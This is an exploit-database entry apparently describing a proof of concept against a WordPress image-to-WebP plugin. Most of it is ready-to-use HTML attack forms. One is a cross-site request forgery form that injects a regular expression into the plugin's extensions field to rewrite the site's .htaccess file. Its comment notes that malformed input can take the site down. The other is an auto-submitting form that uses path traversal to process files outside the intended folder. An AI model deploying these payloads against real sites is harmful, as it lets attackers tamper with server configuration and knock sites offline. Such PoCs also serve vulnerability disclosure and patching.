## https://sploitus.com/exploit?id=WPEX-ID:972F8C5D-22B7-42DE-A981-2E5ACB72297B
The PoC varies based on the endpoint targeted. Here is one example that will modify the website's .htaccess file when the form is submitted by a logged in user.
<form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="plugin_sent" value="1">
<input type="hidden" name="webp_quality" value="50">
<input type="hidden" name="upload_convert" value="1">
<input type="hidden" name="method" value="gd">
<input type="hidden" name="extensions[]" value="jpg">
<!-- Inject regular expression. You can also add invalid regex to make malformed .htaccess file and DoS. -->
<input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*">
<input type=submit>
</form>
This converts file on C:\xampp\htdocs\png_images if WordPress is installed on C:\xampp\htdocs\wordpress\, the path is relative to wp-content
<form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="action" value="convert_old_images">
<input type="hidden" name="only_missing" value="0">
<input type="hidden" name="folder" value="../../png_images">
</form>
<script>form.submit()</form>